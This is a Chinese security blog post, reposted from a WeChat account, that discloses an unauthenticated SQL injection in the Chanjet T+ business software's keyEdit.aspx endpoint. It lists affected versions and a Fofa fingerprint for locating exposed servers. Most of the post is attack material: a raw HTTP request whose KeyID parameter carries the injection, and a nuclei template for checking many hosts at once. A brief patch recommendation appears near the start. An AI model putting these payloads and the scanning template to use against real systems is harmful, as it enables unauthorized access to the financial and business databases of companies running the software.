畅捷通TPlus keyEdit.aspx SQL注入漏洞-PoC

admin 2024年6月13日22:44:13评论13 views字数 2012阅读6分42秒阅读模式

畅捷通是用友集团的成员企业,致力于为企业提供高效、方便的解决方案。好生意是畅捷通公司的产品,能够从不同的维度帮助企业提升效率、降低成本。

畅捷通TPlus keyEdit.aspx SQL注入漏洞-PoC

漏洞介绍 畅捷通TPlus keyEdit.aspx SQL注入漏洞
漏洞描述 畅捷通T+是⼀款企业管理软件,主要⾯向中⼩企业。它提供了包括财务、采购、销售、库存、⽣产制造、⼈⼒资源等在内的全⾯企业管理解决⽅案。通过畅捷通T+,企业可以实现对业务流程的数字化管理,提⾼⼯作效率,降低成本,增强企业竞争⼒。

畅捷通T+ /tplus/UFAQD/keyEdit.aspx接⼝处未对⽤⼾的输⼊进⾏过滤和校验,未经⾝份验证的攻击者可以利⽤SQL注⼊漏洞获取数据库中的信息。

影响产品 畅捷通T+
修复方案 请使⽤此产品的⽤⼾尽快打补丁或更新到最新版本:https://www.chanjet.com

畅捷通TPlus keyEdit.aspx SQL注入漏洞-PoC

用请尽快进行应用系统的检查,确认其中是否存在使用畅捷通T+情况。如果确认存在相关应用的使用,需要立即采取行动,因为这些应用极有可能受到漏洞影响。

影响版本:
畅捷通 T+ 13.0
畅捷通 T+ 16.0

漏洞指纹

Fofa指纹

app="畅捷通-TPlus"

畅捷通TPlus keyEdit.aspx SQL注入漏洞-PoC

漏洞复现poc
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20sys.fn_varbintohexstr(hashbytes(%27MD5%27,%27123456%27)))%20--&preload=1 HTTP/1.1Host: User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflate, brConnection: closeCookie: ASP.NET_SessionId=t5b4ib4lqdfdo5h40mpp5djcUpgrade-Insecure-Requests: 1Priority: u=1Pragma: no-cacheCache-Control: no-cache

畅捷通TPlus keyEdit.aspx SQL注入漏洞-PoC

 nuclei批量验证脚本
id: changjietong_keyEdit_sqliinfo:  name: changjietong_keyEdit_sqli  author: recjl  severity: high  description: description  reference:    - https://  tags: tagsrequests:  - raw:      - |+        GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1        Host: {{Hostname}}        Cache-Control: max-age=0        Upgrade-Insecure-Requests: 1        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7        Referer: http:///tplus/        Accept-Encoding: gzip, deflate, br        Accept-Language: zh-CN,zh;q=0.9        Cookie: ASP.NET_SessionId=wla51k11mgrzdaydypk0muzb        If-None-Match: W/"5b450e7e-666d"        If-Modified-Since: Tue, 10 Jul 2018 19:52:30 GMT        Connection: close    matchers-condition: and    matchers:      - type: word        part: body        words:          - ion:u      - type: status        status:          - 200

畅捷通TPlus keyEdit.aspx SQL注入漏洞-PoC

获取更多的网络安全热讯或者学习交流可以加入群聊!!

原文始发于微信公众号(月落安全):【新洞!】畅捷通TPlus keyEdit.aspx SQL注入漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年6月13日22:44:13
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   畅捷通TPlus keyEdit.aspx SQL注入漏洞-PoChttp://cn-sec.com/archives/2842430.html

发表评论

匿名网友 填写信息